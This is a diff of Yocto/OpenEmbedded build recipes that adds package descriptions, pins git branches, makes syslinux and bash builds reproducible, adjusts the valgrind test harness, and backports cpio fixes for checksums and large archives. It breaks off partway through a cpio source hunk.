SRC_URI[md5sum] = "82133dfa7bba75ff9ad98a7046be687c"
SRC_URI[sha256sum] = "7cf9f447ae7ed1c51722efc45e7f14418d15d7a1e143ac9f09a668999f4fc94d"
diff --git a/meta/recipes-devtools/syslinux/syslinux/determinism.patch b/meta/recipes-devtools/syslinux/syslinux/determinism.patch
new file mode 100644
index 0000000000..2fb8c64df3
--- /dev/null
+++ b/meta/recipes-devtools/syslinux/syslinux/determinism.patch
@@ -0,0 +1,22 @@
+In order to build deterministic binaries, we need to sort the wildcard expansion
+so the libraries are linked in the same order each time. This fixes reproducibility
+issues within syslinux builds.
+
+Upstream-Status: Pending
+RP 2021/3/1
+
+Index: syslinux-6.04-pre2/mk/lib.mk
+===================================================================
+--- syslinux-6.04-pre2.orig/mk/lib.mk
++++ syslinux-6.04-pre2/mk/lib.mk
+@@ -130,8 +130,8 @@ LIBENTRY_OBJS = \
+ exit.o
+
+ LIBGCC_OBJS = \
+- $(patsubst $(com32)/lib/%.c,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.c)) \
+- $(patsubst $(com32)/lib/%.S,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.S))
++ $(sort $(patsubst $(com32)/lib/%.c,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.c))) \
++ $(sort $(patsubst $(com32)/lib/%.S,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.S)))
+
+ LIBCONSOLE_OBJS = \
+ \
diff --git a/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb b/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
index 3e7eef3a75..a5618327bf 100644
--- a/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
+++ b/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
@@ -1,5 +1,6 @@
SUMMARY = "Multi-purpose linux bootloader"
HOMEPAGE = "http://www.syslinux.org/"
+DESCRIPTION = "The Syslinux Project covers lightweight bootloaders for MS-DOS FAT filesystems (SYSLINUX), network booting (PXELINUX), bootable "El Torito" CD-ROMs (ISOLINUX), and Linux ext2/ext3/ext4 or btrfs filesystems (EXTLINUX). The project also includes MEMDISK, a tool to boot legacy operating systems (such as DOS) from nontraditional media; it is usually used in conjunction with PXELINUX and ISOLINUX."
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
file://README;beginline=35;endline=41;md5=558f2c71cb1fb9ba511ccd4858e48e8a"
@@ -22,11 +23,16 @@ SRC_URI = "https://www.zytor.com/pub/syslinux/Testing/6.04/syslinux-${PV}.tar.xz
file://0009-linux-syslinux-implement-install_bootblock.patch \
file://0010-Workaround-multiple-definition-of-symbol-errors.patch \
file://0001-install-don-t-install-obsolete-file-com32.ld.patch \
+ file://determinism.patch \
"
SRC_URI[md5sum] = "2b31c78f087f99179feb357da312d7ec"
SRC_URI[sha256sum] = "4441a5d593f85bb6e8d578cf6653fb4ec30f9e8f4a2315a3d8f2d0a8b3fadf94"
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
UPSTREAM_CHECK_URI = "https://www.zytor.com/pub/syslinux/"
UPSTREAM_CHECK_REGEX = "syslinux-(?P<pver>.+)\.tar"
UPSTREAM_VERSION_UNKNOWN = "1"
diff --git a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
index a7a1f0ff1a..e1233ffde0 100644
--- a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
+++ b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
@@ -1,8 +1,14 @@
+SUMMARY = "Boot performance graphing tool"
+DESCRIPTION = "For systemd-bootchart, several proc debug interfaces are required in the kernel config: \
+ CONFIG_SCHEDSTATS \
+below is optional, for additional info: \
+ CONFIG_SCHED_DEBUG"
+HOMEPAGE = "https://github.com/systemd/systemd-bootchart"
LICENSE = "LGPLv2.1 & GPLv2"
LIC_FILES_CHKSUM = "file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c \
file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe"
-SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https \
+SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https;branch=master \
file://0001-architecture-Recognise-RISCV-32-RISCV-64.patch \
file://mips64.patch \
"
diff --git a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
index ed14fe66b1..b671956cc8 100644
--- a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
+++ b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "Target Communication Framework for the Eclipse IDE"
HOMEPAGE = "http://wiki.eclipse.org/TCF"
+DESCRIPTION = "TCF is a vendor-neutral, lightweight, extensible network protocol mainly for communicating with embedded systems (targets)."
BUGTRACKER = "https://bugs.eclipse.org/bugs/"
LICENSE = "EPL-1.0 | EDL-1.0"
@@ -9,7 +10,7 @@ SRCREV = "a022ef2f1acfd9209a1bf792dda14ae4b0d1b60f"
PV = "1.7.0+git${SRCPV}"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
-SRC_URI = "git://git.eclipse.org/gitroot/tcf/org.eclipse.tcf.agent \
+SRC_URI = "git://git.eclipse.org/r/tcf/org.eclipse.tcf.agent.git;protocol=https;branch=master \
file://fix_ranlib.patch \
file://ldflags.patch \
file://tcf-agent.init \
diff --git a/meta/recipes-devtools/tcltk/tcl_8.6.10.bb b/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
index aedd96b021..35a91b4f09 100644
--- a/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
+++ b/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
@@ -1,5 +1,6 @@
SUMMARY = "Tool Command Language"
HOMEPAGE = "http://tcl.sourceforge.net"
+DESCRIPTION = "Tool Command Language, is an open-source multi-purpose C library which includes a powerful dynamic scripting language. Together they provide ideal cross-platform development environment for any programming project."
SECTION = "devel/tcltk"
# http://www.tcl.tk/software/tcltk/license.html
@@ -32,6 +33,7 @@ SRC_URI_class-native = "${BASE_SRC_URI}"
S = "${WORKDIR}/${BPN}${PV}/unix"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${BPN}${PV}"
VER = "${PV}"
inherit autotools ptest binconfig update-alternatives
diff --git a/meta/recipes-devtools/unfs3/unfs3_git.bb b/meta/recipes-devtools/unfs3/unfs3_git.bb
index d60cee87c9..d1b3fb8f57 100644
--- a/meta/recipes-devtools/unfs3/unfs3_git.bb
+++ b/meta/recipes-devtools/unfs3/unfs3_git.bb
@@ -2,6 +2,7 @@ SUMMARY = "Userspace NFS server v3 protocol"
DESCRIPTION = "UNFS3 is a user-space implementation of the NFSv3 server \
specification. It provides a daemon for the MOUNT and NFS protocols, which \
are used by NFS clients for accessing files on the server."
+HOMEPAGE = "https://github.com/unfs3/unfs3"
SECTION = "console/network"
LICENSE = "unfs3"
LIC_FILES_CHKSUM = "file://LICENSE;md5=9475885294e17c0cc0067820d042792e"
@@ -13,7 +14,7 @@ DEPENDS_append_class-nativesdk = " flex-nativesdk"
ASNEEDED = ""
S = "${WORKDIR}/git"
-SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https \
+SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https;branch=master \
file://unfs3_parallel_build.patch \
file://alternate_rpc_ports.patch \
file://fix_pid_race_parent_writes_child_pid.patch \
@@ -35,7 +36,7 @@ BBCLASSEXTEND = "native nativesdk"
inherit autotools
EXTRA_OECONF_append_class-native = " --sbindir=${bindir}"
CFLAGS_append = " -I${STAGING_INCDIR}/tirpc"
-LDFLAGS_append = " -ltirpc"
+EXTRA_OECONF_append = " LIBS=-ltirpc"
# Turn off these header detects else the inode search
# will walk entire file systems and this is a real problem
diff --git a/meta/recipes-devtools/unifdef/unifdef_2.12.bb b/meta/recipes-devtools/unifdef/unifdef_2.12.bb
index 22b10ba234..b42051b8b6 100644
--- a/meta/recipes-devtools/unifdef/unifdef_2.12.bb
+++ b/meta/recipes-devtools/unifdef/unifdef_2.12.bb
@@ -2,6 +2,7 @@ SUMMARY = "Selectively remove #ifdef statements from sources"
SECTION = "devel"
LICENSE = "BSD-2-Clause"
HOMEPAGE = "http://dotat.at/prog/unifdef/"
+DESCRIPTION = "The unifdef utility selectively processes conditional C preprocessor #if and #ifdef directives. It removes from a file both the directives and the additional text that they delimit, while otherwise leaving the file alone."
LIC_FILES_CHKSUM = "file://COPYING;md5=3498caf346f6b77934882101749ada23 \
file://unifdef.c;endline=32;md5=6f4ee8085d6e6ab0f7cb4390e1a9c497 \
diff --git a/meta/recipes-devtools/vala/vala.inc b/meta/recipes-devtools/vala/vala.inc
index 703ed1aa8d..71da2ef07c 100644
--- a/meta/recipes-devtools/vala/vala.inc
+++ b/meta/recipes-devtools/vala/vala.inc
@@ -1,4 +1,5 @@
SUMMARY = "C#-like programming language for easing GObject programming"
+HOMEPAGE = "http://vala-project.org"
DESCRIPTION = "Vala is a C#-like language dedicated to ease GObject programming. \
Vala compiles to plain C and has no runtime environment nor penalities whatsoever."
SECTION = "devel"
@@ -12,7 +13,6 @@ DEPENDS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'api-doc
# vala-native contains a native version of vapigen, which we use instead of the target one
DEPENDS_append_class-target = " vala-native"
BBCLASSEXTEND = "native"
-HOMEPAGE = "http://vala-project.org"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24"
diff --git a/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch b/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
index 7985308e41..0c399ef52c 100644
--- a/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
+++ b/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
@@ -19,6 +19,11 @@ Upstream-Status: Pending
Signed-off-by: Dave Lerner <dave.lerner@windriver.com>
Signed-off-by: Tudor Florea <tudor.florea@enea.com>
Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+
+Increase time limit to 90 s.
+(double of the expected time of drd/tests/std_list on qemuarm64)
+
+Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>
---
tests/vg_regtest.in | 75 +++++++++++++++++++++++++++++++++++++++--------------
1 file changed, 55 insertions(+), 20 deletions(-)
@@ -66,7 +71,7 @@ index a441f42..cb05b52 100755
# Since most of the program time is spent in system() calls, need this to
# propagate a Ctrl-C enabling us to quit.
-sub mysystem($)
-+# Enforce 30 seconds limit for the test.
++# Enforce 90 seconds limit for the test.
+# This resume execution of the remaining tests if valgrind hangs.
+sub mysystem($)
{
@@ -76,7 +81,7 @@ index a441f42..cb05b52 100755
+ my $exit_code=0;
+ eval {
+ local $SIG{'ALRM'} = sub { die "timed out\n" };
-+ alarm(30);
++ alarm(90);
+ $exit_code = system($_[0]);
+ alarm (0);
+ ($exit_code == 2) and die "SIGINT\n"; # 2 is SIGINT
diff --git a/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 b/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
index a3a0c6e50f..afa6a94825 100644
--- a/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
@@ -31,8 +31,6 @@ drd/tests/annotate_static
drd/tests/annotate_trace_memory
drd/tests/annotate_trace_memory_xml
drd/tests/atomic_var
-drd/tests/bar_bad
-drd/tests/bar_bad_xml
drd/tests/bar_trivial
drd/tests/bug-235681
drd/tests/bug322621
@@ -122,6 +120,7 @@ drd/tests/tc19_shadowmem
drd/tests/tc21_pthonce
drd/tests/tc22_exit_w_lock
drd/tests/tc23_bogus_condwait
+gdbserver_tests/hginfo
helgrind/tests/annotate_rwlock
helgrind/tests/annotate_smart_pointer
helgrind/tests/bar_bad
diff --git a/meta/recipes-devtools/valgrind/valgrind/remove-for-all b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
new file mode 100644
index 0000000000..88a11ca332
--- /dev/null
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
@@ -0,0 +1,4 @@
+drd/tests/bar_bad
+drd/tests/bar_bad_xml
+gdbserver_tests/hginfo
+memcheck/tests/linux/timerfd-syscall
diff --git a/meta/recipes-devtools/valgrind/valgrind/run-ptest b/meta/recipes-devtools/valgrind/valgrind/run-ptest
index 97b0a85dbf..7217dfca5d 100755
--- a/meta/recipes-devtools/valgrind/valgrind/run-ptest
+++ b/meta/recipes-devtools/valgrind/valgrind/run-ptest
@@ -17,6 +17,12 @@ EXP_TOOLS="exp-bbv exp-dhat exp-sgcheck"
GDB_BIN=@bindir@/gdb
cd ${VALGRIND_LIB}/ptest && ./gdbserver_tests/make_local_links ${GDB_BIN}
+echo "Hide valgrind tests that are non-deterministic"
+echo "Reported at https://bugs.kde.org/show_bug.cgi?id=430321"
+for i in `cat remove-for-all`; do
+ mv $i.vgtest $i.IGNORE;
+done
+
arch=`arch`
if [ "$arch" = "aarch64" ]; then
echo "Aarch64: Hide valgrind tests that result in defunct process and then out of memory"
@@ -44,6 +50,10 @@ if [ "$arch" = "aarch64" ]; then
done
fi
+echo "Restore valgrind tests that are non-deterministc"
+for i in `cat remove-for-all`; do
+ mv $i.IGNORE $i.vgtest;
+done
passed=`grep PASS: ${LOG}|wc -l`
failed=`grep FAIL: ${LOG}|wc -l`
diff --git a/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb b/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
index a764d18177..67999e579a 100644
--- a/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
+++ b/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Valgrind memory debugger and instrumentation framework"
HOMEPAGE = "http://valgrind.org/"
+DESCRIPTION = "Valgrind is an instrumentation framework for building dynamic analysis tools. There are Valgrind tools that can automatically detect many memory management and threading bugs, and profile your programs in detail."
BUGTRACKER = "http://valgrind.org/support/bug_reports.html"
LICENSE = "GPLv2 & GPLv2+ & BSD"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
@@ -16,6 +17,7 @@ SRC_URI = "https://sourceware.org/pub/valgrind/valgrind-${PV}.tar.bz2 \
file://Added-support-for-PPC-instructions-mfatbu-mfatbl.patch \
file://run-ptest \
file://remove-for-aarch64 \
+ file://remove-for-all \
file://0004-Fix-out-of-tree-builds.patch \
file://0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch \
file://0001-Remove-tests-that-fail-to-build-on-some-PPC32-config.patch \
@@ -105,7 +107,7 @@ VALGRINDARCH_mipsel = "mips32"
VALGRINDARCH_mips64el = "mips64"
VALGRINDARCH_powerpc = "ppc"
VALGRINDARCH_powerpc64 = "ppc64"
-VALGRINDARCH_powerpc64el = "ppc64le"
+VALGRINDARCH_powerpc64le = "ppc64le"
INHIBIT_PACKAGE_STRIP_FILES = "${PKGD}${libdir}/valgrind/vgpreload_memcheck-${VALGRINDARCH}-linux.so"
@@ -171,6 +173,7 @@ do_install_ptest() {
# The scripts reference config.h so add it to the top ptest dir.
cp ${B}/config.h ${D}${PTEST_PATH}
install -D ${WORKDIR}/remove-for-aarch64 ${D}${PTEST_PATH}
+ install -D ${WORKDIR}/remove-for-all ${D}${PTEST_PATH}
# Add an executable need by none/tests/bigcode
mkdir ${D}${PTEST_PATH}/perf
diff --git a/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb b/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
index 7d27c43c83..d988e1ffce 100644
--- a/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
+++ b/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
@@ -1,5 +1,6 @@
SUMMARY = "A shell-script tool for converting XML files to various formats"
-HOMEPAGE = "https://releases.pagure.org/xmlto/"
+HOMEPAGE = "https://pagure.io/xmlto"
+DESCRIPTION = "Utility xmlto is a simple shell-script tool for converting XML files to various formats. It serves as easy to use command line frontend to make fine output without remembering many long options and searching for the syntax of the backends."
SECTION = "docs/xmlto"
LICENSE = "GPLv2"
@@ -29,7 +30,7 @@ RDEPENDS_${PN}_append_class-target = " \
libxslt-bin \
coreutils \
"
-CACHED_CONFIGUREVARS += "ac_cv_path_TAIL=tail"
+CACHED_CONFIGUREVARS += "ac_cv_path_TAIL=tail ac_cv_path_GREP=grep"
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch
new file mode 100644
index 0000000000..14c1cd806e
--- /dev/null
+++ b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch
@@ -0,0 +1,42 @@
+From 44d2d6095246124c024230f89c1029794491839f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Miro=20Hron=C4=8Dok?= <miro@hroncok.cz>
+Date: Fri, 30 Oct 2020 15:10:35 +0100
+Subject: [PATCH] Properly detect and compare Python version 3.10+ (#151)
+
+Upstream commit: https://github.com/asciidoc-py/asciidoc-py/commit/44d2d6095246124c024230f89c1029794491839f
+
+Slightly modified to cleanly apply to asciidoc 8.6.9:
+- VERSION and MIN_PYTHON_VERSION changed to reflect values in 8.6.9
+- line numbers corrected to eliminate offset warnings
+
+Upstream-Status: Backport
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ asciidoc.py | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/asciidoc.py b/asciidoc.py
+index f960e7d8..42868c4b 100755
+--- a/asciidoc.py
++++ b/asciidoc.py
+@@ -30,7 +30,7 @@
+ # Used by asciidocapi.py #
+ VERSION = '8.6.10' # See CHANGELOG file for version history.
+
+-MIN_PYTHON_VERSION = '3.4' # Require this version of Python or better.
++MIN_PYTHON_VERSION = (3, 4) # Require this version of Python or better.
+
+ # ---------------------------------------------------------------------------
+ # Program constants.
+@@ -4704,8 +4704,8 @@ def init(self, cmd):
+ directory.
+ cmd is the asciidoc command or asciidoc.py path.
+ """
+- if float(sys.version[:3]) < float(MIN_PYTHON_VERSION):
+- message.stderr('FAILED: Python %s or better required' % MIN_PYTHON_VERSION)
++ if sys.version_info[:2] < MIN_PYTHON_VERSION:
++ message.stderr('FAILED: Python %d.%d or better required' % MIN_PYTHON_VERSION)
+ sys.exit(1)
+ if not os.path.exists(cmd):
+ message.stderr('FAILED: Missing asciidoc command: %s' % cmd)
diff --git a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
index 751bf0f19f..325ff9aa15 100644
--- a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
+++ b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
@@ -8,8 +8,9 @@ LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \
file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069"
-SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https \
- file://auto-catalogs.patch"
+SRC_URI = "git://github.com/asciidoc/asciidoc-py;protocol=https;branch=main \
+ file://auto-catalogs.patch \
+ file://detect-python-version.patch"
SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0"
PV .= "+py3-git${SRCPV}"
diff --git a/meta/recipes-extended/bash/bash.inc b/meta/recipes-extended/bash/bash.inc
index 1ebb33bdcd..4e6176d2e6 100644
--- a/meta/recipes-extended/bash/bash.inc
+++ b/meta/recipes-extended/bash/bash.inc
@@ -1,5 +1,6 @@
SUMMARY = "An sh-compatible command language interpreter"
HOMEPAGE = "http://tiswww.case.edu/php/chet/bash/bashtop.html"
+DESCRIPTION = "Bash is the GNU Project's Bourne Again SHell, a complete implementation of the IEEE POSIX and Open Group shell specification with interactive command line editing, job control on architectures that support it, csh-like features such as history substitution and brace expansion, and a slew of other features."
SECTION = "base/shell"
DEPENDS = "ncurses bison-native virtual/libiconv"
@@ -48,6 +49,11 @@ do_compile_ptest () {
oe_runmake buildtest
}
+do_install_prepend () {
+ # Ensure determinism as this counter increases for each make call
+ rm -f ${B}/.build
+}
+
do_install_append () {
# Move /usr/bin/bash to /bin/bash, if need
if [ "${base_bindir}" != "${bindir}" ]; then
diff --git a/meta/recipes-extended/bash/bash/bash-CVE-2019-18276.patch b/meta/recipes-extended/bash/bash/CVE-2019-18276.patch
index 7b2073201e..7b2073201e 100644
--- a/meta/recipes-extended/bash/bash/bash-CVE-2019-18276.patch
+++ b/meta/recipes-extended/bash/bash/CVE-2019-18276.patch
diff --git a/meta/recipes-extended/bash/bash_5.0.bb b/meta/recipes-extended/bash/bash_5.0.bb
index 257a03bd8b..53e05869ce 100644
--- a/meta/recipes-extended/bash/bash_5.0.bb
+++ b/meta/recipes-extended/bash/bash_5.0.bb
@@ -30,7 +30,7 @@ SRC_URI = "${GNU_MIRROR}/bash/${BP}.tar.gz;name=tarball \
file://run-ptest \
file://run-bash-ptests \
file://fix-run-builtins.patch \
- file://bash-CVE-2019-18276.patch \
+ file://CVE-2019-18276.patch \
"
SRC_URI[tarball.md5sum] = "2b44b47b905be16f45709648f671820b"
diff --git a/meta/recipes-extended/bc/bc_1.07.1.bb b/meta/recipes-extended/bc/bc_1.07.1.bb
index 4a51302492..8ed10d14c2 100644
--- a/meta/recipes-extended/bc/bc_1.07.1.bb
+++ b/meta/recipes-extended/bc/bc_1.07.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Arbitrary precision calculator language"
HOMEPAGE = "http://www.gnu.org/software/bc/bc.html"
+DESCRIPTION = "bc is an arbitrary precision numeric processing language. Syntax is similar to C, but differs in many substantial areas. It supports interactive execution of statements."
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
@@ -31,4 +32,4 @@ do_compile_prepend() {
ALTERNATIVE_${PN} = "bc dc"
ALTERNATIVE_PRIORITY = "100"
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-extended/bzip2/bzip2/Makefile.am b/meta/recipes-extended/bzip2/bzip2/Makefile.am
index dcf64584d9..adc85a62b2 100644
--- a/meta/recipes-extended/bzip2/bzip2/Makefile.am
+++ b/meta/recipes-extended/bzip2/bzip2/Makefile.am
@@ -1,6 +1,6 @@
lib_LTLIBRARIES = libbz2.la
-libbz2_la_LDFLAGS = -version-info 1:6:0
+libbz2_la_LDFLAGS = -version-info 1:8:0
libbz2_la_SOURCES = blocksort.c \
huffman.c \
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch
new file mode 100644
index 0000000000..2dfd348d7c
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch
@@ -0,0 +1,58 @@
+From d257e47a6c6b41ba727b196ac96c05ab91bd9d65 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Fri, 7 Apr 2023 11:23:37 +0300
+Subject: [PATCH 3/4] Fix calculation of CRC in copy-out mode.
+
+* src/copyout.c (read_for_checksum): Fix type of the file_size argument.
+Rewrite the reading loop.
+
+Original patch by Stefano Babic <sbabic@denx.de>
+
+Upstream-Status: Backport [a1b2f7871c3ae5113e0102b870b15ea06a8f0e3d]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ src/copyout.c | 16 +++++++---------
+ 1 file changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/src/copyout.c b/src/copyout.c
+index 8b0beb6..f1ff351 100644
+--- a/src/copyout.c
++++ b/src/copyout.c
+@@ -34,27 +34,25 @@
+ compute and return a checksum for them. */
+
+ static uint32_t
+-read_for_checksum (int in_file_des, int file_size, char *file_name)
++read_for_checksum (int in_file_des, off_t file_size, char *file_name)
+ {
+ uint32_t crc;
+- char buf[BUFSIZ];
+- int bytes_left;
+- int bytes_read;
+- int i;
++ unsigned char buf[BUFSIZ];
++ ssize_t bytes_read;
++ ssize_t i;
+
+ crc = 0;
+
+- for (bytes_left = file_size; bytes_left > 0; bytes_left -= bytes_read)
++ while (file_size > 0)
+ {
+ bytes_read = read (in_file_des, buf, BUFSIZ);
+ if (bytes_read < 0)
+ error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
+ if (bytes_read == 0)
+ break;
+- if (bytes_left < bytes_read)
+- bytes_read = bytes_left;
+- for (i = 0; i < bytes_read; ++i)
++ for (i = 0; i < bytes_read; i++)
+ crc += buf[i] & 0xff;
++ file_size -= bytes_read;
+ }
+ if (lseek (in_file_des, 0L, SEEK_SET))
+ error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
+--
+2.39.2
+
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
new file mode 100644
index 0000000000..c212bddf7d
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
@@ -0,0 +1,312 @@
+From 8513495ab5cfb63eb7c4c933fdf0b78c6196cd27 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Fri, 28 Apr 2023 15:23:46 +0300
+Subject: [PATCH 4/4] Fix appending to archives bigger than 2G
+
+* src/extern.h (last_header_start): Change type to off_t.
+* src/global.c: Likewise.
+* src/util.c (prepare_append): Use off_t for file offsets.
+
+Upstream-Status: Backport [0987d63384f0419b4b14aecdc6a61729b75ce86a]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ src/extern.h | 11 ++++-----
+ src/global.c | 2 +-
+ src/util.c | 66 ++++++++++++++++++++++++++--------------------------
+ 3 files changed, 39 insertions(+), 40 deletions(-)
+
+diff --git a/src/extern.h b/src/extern.h
+index 11ac6bf..12f14a9 100644
+--- a/src/extern.h
++++ b/src/extern.h
+@@ -67,7 +67,7 @@ extern int ignore_devno_option;
+
+ extern bool to_stdout_option;
+
+-extern int last_header_start;
++extern off_t last_header_start;
+ extern int copy_matching_files;
+ extern int numeric_uid;
+ extern char *pattern_file_name;
+@@ -123,7 +123,7 @@ void field_width_error (const char *filename, const char *fieldname,
+
+ /* copypass.c */
+ void process_copy_pass (void);
+-int link_to_maj_min_ino (char *file_name, int st_dev_maj,
++int link_to_maj_min_ino (char *file_name, int st_dev_maj,
+ int st_dev_min, ino_t st_ino);
+ int link_to_name (char const *link_name, char const *link_target);
+
+@@ -171,7 +171,7 @@ void copy_files_tape_to_disk (int in_des, int out_des, off_t num_bytes);
+ void copy_files_disk_to_tape (int in_des, int out_des, off_t num_bytes, char *filename);
+ void copy_files_disk_to_disk (int in_des, int out_des, off_t num_bytes, char *filename);
+ void warn_if_file_changed (char *file_name, off_t old_file_size,
+- time_t old_file_mtime);
++ time_t old_file_mtime);
+ void create_all_directories (char const *name);
+ void prepare_append (int out_file_des);
+ char *find_inode_file (ino_t node_num,
+@@ -185,7 +185,7 @@ void set_new_media_message (char *message);
+ #ifdef HPUX_CDF
+ char *add_cdf_double_slashes (char *filename);
+ #endif
+-void write_nuls_to_file (off_t num_bytes, int out_des,
++void write_nuls_to_file (off_t num_bytes, int out_des,
+ void (*writer) (char *in_buf,
+ int out_des, off_t num_bytes));
+ #define DISK_IO_BLOCK_SIZE 512
+@@ -229,6 +229,5 @@ void delay_set_stat (char const *file_name, struct stat *st,
+ mode_t invert_permissions);
+ int repair_delayed_set_stat (struct cpio_file_stat *file_hdr);
+ void apply_delayed_set_stat (void);
+-
+-int arf_stores_inode_p (enum archive_format arf);
+
++int arf_stores_inode_p (enum archive_format arf);
+diff --git a/src/global.c b/src/global.c
+index fb3abe9..5c9fc05 100644
+--- a/src/global.c
++++ b/src/global.c
+@@ -114,7 +114,7 @@ int debug_flag = false;
+
+ /* File position of last header read. Only used during -A to determine
+ where the old TRAILER!!! record started. */
+-int last_header_start = 0;
++off_t last_header_start = 0;
+
+ /* With -i; if true, copy only files that match any of the given patterns;
+ if false, copy only files that do not match any of the patterns. (-f) */
+diff --git a/src/util.c b/src/util.c
+index 4421b20..3be89a4 100644
+--- a/src/util.c
++++ b/src/util.c
+@@ -60,8 +60,8 @@ tape_empty_output_buffer (int out_des)
+ static long output_bytes_before_lseek = 0;
+
+ /* Some tape drivers seem to have a signed internal seek pointer and
+- they lose if it overflows and becomes negative (e.g. when writing
+- tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
++ they lose if it overflows and becomes negative (e.g. when writing
++ tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
+ seek pointer and prevent it from overflowing. */
+ if (output_is_special
+ && ( (output_bytes_before_lseek += output_size) >= 1073741824L) )
+@@ -106,7 +106,7 @@ static ssize_t sparse_write (int fildes, char *buf, size_t nbyte, bool flush);
